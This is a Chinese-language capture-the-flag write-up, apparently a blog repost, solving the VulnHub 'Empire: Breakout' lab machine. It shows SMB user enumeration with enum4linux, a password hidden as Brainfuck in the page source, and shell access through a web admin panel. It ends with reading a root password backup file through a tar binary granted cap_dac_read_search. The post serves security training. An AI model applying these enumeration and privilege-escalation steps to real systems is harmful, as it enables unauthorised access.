天天看點
傳回

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

作者:ailx10
vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​
  • 英文名稱:Empire: Breakout
  • 中文名稱:帝國:突圍
  • 釋出日期:2021 年 10 月 21 日
  • 難度:容易
  • 描述:這個盒子被建立為一個簡單的盒子,但如果你迷路了,它可以是中等的。提示不和諧伺服器( https://discord.gg/7asvAhCEhe )
  • 下載下傳位址:https://www.vulnhub.com/entry/empire-breakout,751/
vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

ailx10

網絡安全優秀回答者

網絡安全碩士

去咨詢

1、擷取IP位址基本資訊(192.168.199.166)

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

IP

2、端口掃描,發現80、139、445、10000、20000端口

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

開放的端口

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

10000端口

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

20000端口

3、進入web頁面,檢視源代碼,得到線索

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

web首頁

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

檢視源代碼,得到線索

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.

4、brainfuck線上解碼,得到線索:.2uqPEfj3D<P'a-3

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

brainfuck線上解碼

5、使用enum4linux對445端口進行使用者探測,拿到使用者名:cyber

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

enum4linux -a 192.168.199.166

[+] Enumerating users using SID S-1-5-21-1683874020-4104641535-3793993001 and logon username '', password ''

S-1-5-21-1683874020-4104641535-3793993001-501 BREAKOUT\nobody (Local User)
S-1-5-21-1683874020-4104641535-3793993001-513 BREAKOUT\None (Domain Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''

S-1-22-1-1000 Unix User\cyber (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''

S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

6、嘗試登入web頁面,成功登入20000端口

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

20000端口登入成功

7、點選左下角shell圖示,直接拿到互動式shell,輕松收下普通使用者的flag

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

普通使用者flag

8、全看tar權限,可以讀取任意檔案

vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

CAP_DAC_READ_SEARCH: 忽略檔案讀及目錄搜尋的 DAC 通路限制

[cyber@breakout ~]$ ls -hl tar
-rwxr-xr-x 1 root root 520K Oct 19  2021 tar
[cyber@breakout ~]$ getcap tar
tar cap_dac_read_search=ep

9、使用tar壓縮和解壓縮,成功獲得root 權限的flag 

cyber@breakout ~]$ ./tar -cvf ailx10.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
/var/backups/.old_pass.bak
[cyber@breakout ~]$ ./tar -xvf ailx10.tar
var/backups/.old_pass.bak
[cyber@breakout ~]$ ls
ailx10.tar
tar
user.txt
var
[cyber@breakout ~]$ cat ./var/backups/.old_pass.bak
Ts&4&YurgtRX(=~h
vulnhub刷題記錄(Empire: Breakout)ailx10ailx10​

tar壓縮和解壓縮

到此,實驗完成~

釋出于 2022-08-20 22:43

上一篇: 三個案例,揭示母嬰代理商各具特色的“突圍之路”
下一篇: vulnhub刷題記錄(The Planets: Earth)